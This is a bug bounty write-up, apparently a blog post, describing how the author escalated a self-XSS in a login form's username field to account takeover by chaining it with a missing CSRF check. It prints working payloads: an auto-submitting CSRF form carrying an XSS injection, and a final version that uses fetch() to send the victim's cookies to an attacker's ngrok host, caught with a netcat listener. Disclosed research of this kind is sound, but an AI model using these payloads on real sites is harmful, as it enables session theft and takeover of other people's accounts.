From Self XSS to Account Take Over(ATO)
Hello there ,
I’m Mostafa Elguerdawi, Today , I would like to share about one of my recent finding in HackerOne ‘s program
Let’s say : https://reacted.com
When I’m testing on this site, there is a login function, as normal I tried login bypass using Response Manipulation, Default Credentials, and SQL Injection.
but nothing work, I decided to examine the source code and found of the username that I entered a little while ago printed inside the value attribute.
I thought about trying an XSS injection so, I attempted to inject a double quote(“) within the username, I found that there is no filtering on it.
So, I thought about injecting ‘<’, which might also work.
Indeed, it worked!
So, I attempted to injecting a complete payload :
"> <svg/onload=alert("XSS")>And it also succeeded!
Unfortunately, this is a self-XSS
Escalation phase
I ran my Burp Suite and intercepted the request during the login attempt.
From the request, I noticed that there is no protection against CSRF, which is expected from a login function.
I attempted to escalate the self-XSS to reflected XSS using CSRF.
The payload used :
<html>
<body>
<form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
<input type="hidden" name="loginName" value="" ><svg/onmouseover=alert(1) ">
<input type="hidden" name="loginPassword" value="test"/>
<input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
</form>
<script>
document.addEventListener('DOMContentLoaded', function(event) {
document.createElement('form').submit.call(document.getElementById('myForm'));
});
</script>
</body>
<html>
Yes, it worked!
with the help of ngrok, I managed to obtain anyone’s cookies
I opened two terminal tabs
first : ngrok http 80
second : sudo nc -nlvp 80
I used this payload in username :
" > <script>
fetch(‘https://<ngrok-Domain>', { method: ‘POST’, mode: ‘no-cors’, body:document.cookie });
</script> "
"  : is a double quote and white space encoded in html
This payload retrieves the user’s cookies and sends them to me. With the help of netcat(nc), I can obtain these cookies.
final payload :
<html>
<body>
<form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
<input type="hidden" name="loginName" value="" > <script>
fetch('https://<ngrok-host>', { method: 'POST', mode: 'no-cors', body:document.cookie });
</script> ""/>
<input type="hidden" name="loginPassword" value="test"/>
<input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
</form>
<script>
document.addEventListener('DOMContentLoaded', function(event) {
document.createElement('form').submit.call(document.getElementById('myForm'));
});
</script>
</body>
<html>
Finally, I managed to obtain the cookies.